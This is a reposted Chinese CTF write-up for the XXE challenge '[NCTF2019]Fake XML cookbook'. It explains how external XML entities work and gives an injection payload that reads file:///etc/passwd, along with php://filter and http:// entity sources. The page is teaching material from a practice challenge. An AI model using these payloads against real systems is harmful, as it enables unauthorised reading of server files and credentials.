当前位置: 首页 > news >正文

XXE漏洞 [NCTF2019]Fake XML cookbook1

打开题目

查看源代码

发现我们post传入的数据都被放到了doLogin.php下面

访问一下看看

提示加载外部xml实体

我们知道外部xml实体的格式是

<!ENTITY 实体名称 SYSTEM "URI/URL">

bp抓包一下看看

得到flag

或者这样

但是很明显这样是不行的,因为资源是在admin上,也就是用户名那里

PHP引用外部实体,常见的利用协议
file://文件绝对路径

如:

file:///etc/passwd

http://url/file.txt

php://filter/read=convert.base64-encode/resource=xxx.php

参数实体+外部实体

<!ENTITY % 实体名称 SYSTEM "URI/URL">

参数实体+外部实体

示例代码:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "file:///etc/passwd">

%file;

]>

%file(参数实体)是在DTD中被引用的,而&file;是在xml文档中被引用的。

最简单的xxe注入

 知识点源于:XML注入攻击总结_xml攻击-CSDN博客

从XML相关一步一步到XXE漏洞 - 先知社区

相关文章:

  • 目前做网站流行的语言网站公司
  • 用.net做网站中含有论坛百度网站权重查询
  • 做html网站模板下载地址买卖平台
  • 网站排名优化有哪些牛霸天的软件1seo网络推广是干嘛的
  • 外贸网站是怎么做的seo优化策略
  • 网络销售应该注册什么公司温州seo公司
  • SQL Server 安装教程
  • MySQL——表的增删查改
  • 软件设计模式:UML类图
  • 概率论复习
  • 竞赛保研 python的搜索引擎系统设计与实现
  • 基于YOLOv8的草莓病害检测,加入EMA注意力和GPFN提升病害检测能力
  • [Ray Tracing in One Weekend] 笔记
  • Golang(壹)
  • OpenHarmony开发环境快速搭建(无需命令行)
  • LeetCode 每日一题 Day 17 || 二分
  • Flink系列之:SQL提示
  • 让AIGC成为你的智能外脑,助力你的工作和生活
  • 八股文打卡day1——计算机网络(1)
  • 八股文打卡day2——计算机网络(2)
  • el-select二次封装实现可分页加载数据
  • 什么店生意好?C++采集美团商家信息做数据分析
  • Python Django 连接 PostgreSQL 操作实例
  • React 组件生命周期
  • R语言|分面中嵌入趋势线
  • 【Spark面试】Spark面试题答案